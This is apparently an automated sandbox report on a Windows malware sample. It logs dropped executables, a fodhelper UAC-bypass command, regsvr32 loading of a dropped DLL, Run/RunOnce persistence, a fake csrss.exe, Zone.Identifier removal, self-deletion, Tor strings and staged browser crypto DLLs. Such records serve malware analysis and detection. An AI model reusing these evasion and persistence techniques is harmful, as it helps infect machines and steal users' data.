Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5AAB.exe C:\Users\user\AppData\Local\Temp\5AAB.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6ED0.exe C:\Users\user\AppData\Local\Temp\6ED0.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process created: C:\Users\user\AppData\Local\Temp\820.exe C:\Users\user\AppData\Local\Temp\820.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 716	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 724	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 780	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 864	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5836 -ip 5836	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 360	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1C75.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process created: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6ED0.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Window found: window name: TButton

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\3ABE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Unpacked PE file: 0.2.16GAuqLUFK.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.niwodil:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\eieeggj	Unpacked PE file: 4.2.eieeggj.400000.0.unpack .text:ER;.rdata:R;.data:W;.niwodil:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Unpacked PE file: 7.2.16E6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.moye:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Unpacked PE file: 22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.viji:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Unpacked PE file: 32.2.toolspub2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zona:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5AAB.exe	Unpacked PE file: 33.2.5AAB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yovot:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Unpacked PE file: 38.2.nsn5FE8.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nuz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Unpacked PE file: 7.2.16E6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Unpacked PE file: 22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Unpacked PE file: 38.2.nsn5FE8.tmp.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\820.exe

Code function: 6_2_0069D030 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

6_2_0069D030

Source: initial sample

Static PE information: section where entry point is pointing to: Lny6jo2

Source: BroomSetup.exe.28.dr	Static PE information: real checksum: 0x0 should be: 0x55278a
Source: 1C75.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x22f328
Source: 28CC.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0xcd5e3
Source: 288c47bbc1871b439df19ff4df68f076.exe.21.dr	Static PE information: real checksum: 0x440e75 should be: 0x43c3c8
Source: 6ED0.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x68f765
Source: 6ED0.tmp.37.dr	Static PE information: real checksum: 0x0 should be: 0xb0991
Source: INetC.dll.28.dr	Static PE information: real checksum: 0x0 should be: 0x69a0
Source: InstallSetup9.exe.21.dr	Static PE information: real checksum: 0x0 should be: 0x248f37
Source: 3ABE.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x6c7363

Source: 16GAuqLUFK.exe	Static PE information: section name: .niwodil
Source: 1C75.dll.2.dr	Static PE information: section name: Lny6jo2
Source: 1C75.dll.2.dr	Static PE information: section name: yvQ
Source: 1C75.dll.2.dr	Static PE information: section name: c83H3w4t
Source: 23F8.exe.2.dr	Static PE information: section name: .vmp
Source: 23F8.exe.2.dr	Static PE information: section name: .vmp
Source: 23F8.exe.2.dr	Static PE information: section name: .vmp
Source: 16E6.exe.2.dr	Static PE information: section name: .moye
Source: 5AAB.exe.2.dr	Static PE information: section name: .yovot
Source: ireeggj.2.dr	Static PE information: section name: .zona
Source: eieeggj.2.dr	Static PE information: section name: .niwodil
Source: 288c47bbc1871b439df19ff4df68f076.exe.21.dr	Static PE information: section name: .viji
Source: toolspub2.exe.21.dr	Static PE information: section name: .zona
Source: BroomSetup.exe.28.dr	Static PE information: section name: .didata
Source: syncUpd[1].exe.28.dr	Static PE information: section name: .nuz
Source: nsn5FE8.tmp.exe.28.dr	Static PE information: section name: .nuz
Source: msvcp140.dll.38.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.38.dr	Static PE information: section name: .didat
Source: nss3.dll.38.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.38.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.38.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.38.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.38.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.38.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.38.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.38.dr	Static PE information: section name: .00cfg

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1C75.dll

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004014A1 push es; iretd	0_2_004014A3
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004022A8 pushfd ; ret	0_2_004022C7
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00412809 push 3B004301h; ret	0_2_0041280E
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004D1506 push es; iretd	0_2_004D150A
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004D230F pushfd ; ret	0_2_004D232E
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0051246B push ss; iretd	0_2_00512471
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0050FC04 pushfd ; ret	0_2_0050FCE3
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0050F0C9 push es; iretd	0_2_0050F0E9
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00515D0C push cs; iretd	0_2_00515D0E
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0050F5DF push 8A1E29FAh; iretd	0_2_0050F5E4
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004014A1 push es; iretd	4_2_004014A3
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004022A8 pushfd ; ret	4_2_004022C7
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00412809 push 3B004301h; ret	4_2_0041280E
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00481506 push es; iretd	4_2_0048150A
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0048230F pushfd ; ret	4_2_0048232E
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004BECC4 pushfd ; ret	4_2_004BEDA3
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004BE69F push 8A1E29FAh; iretd	4_2_004BE6A4
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004C152B push ss; iretd	4_2_004C1531
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004C4DCC push cs; iretd	4_2_004C4DCE
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004BE189 push es; iretd	4_2_004BE1A9
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_0530C70A pushad ; ret	5_2_0530C70C
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_0537280A push 5A36841Dh; retf	5_2_05372825
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_053AA4BD push cs; ret	5_2_053AA4BE
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_053AA7F8 push edx; retf	5_2_053AA7F9
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_052B82EF push ebx; iretd	5_2_052B82F7
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_053727ED push ebp; retf	5_2_053727EE
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 6_2_00696299 push ecx; ret	6_2_006962AC
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0230BAFD push ebp; iretd	7_2_0230BAFF

Source: initial sample	Static PE information: section name: .text entropy: 7.034748545360275
Source: initial sample	Static PE information: section name: .text entropy: 6.814607786978596
Source: initial sample	Static PE information: section name: .text entropy: 7.931279106383294
Source: initial sample	Static PE information: section name: .text entropy: 7.037828365112958
Source: initial sample	Static PE information: section name: .text entropy: 7.023130271257234
Source: initial sample	Static PE information: section name: .text entropy: 7.034748545360275
Source: initial sample	Static PE information: section name: .text entropy: 7.023130271257234
Source: initial sample	Static PE information: section name: .text entropy: 7.202781320302127
Source: initial sample	Static PE information: section name: .text entropy: 7.202781320302127

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\820.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\eieeggj	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\820.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	File created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6ED0.exe	File created: C:\Users\user\AppData\Local\Temp\is-6V76P.tmp\6ED0.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6ED0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3ABE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ireeggj	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5AAB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\23F8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\16E6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\28CC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	File created: C:\Users\user\AppData\Local\Temp\nsk58E2.tmp\INetC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	File created: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1C75.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\syncUpd[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	File created: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\820.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\820.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ireeggj			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\eieeggj			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HostFile			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\820.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HostFile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HostFile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HostFile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HostFile	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\16gauqlufk.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\eieeggj:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\ireeggj:Zone.Identifier read attributes \| delete			Jump to behavior

May use the Tor software to hide its network traffic

Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: onion-port

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
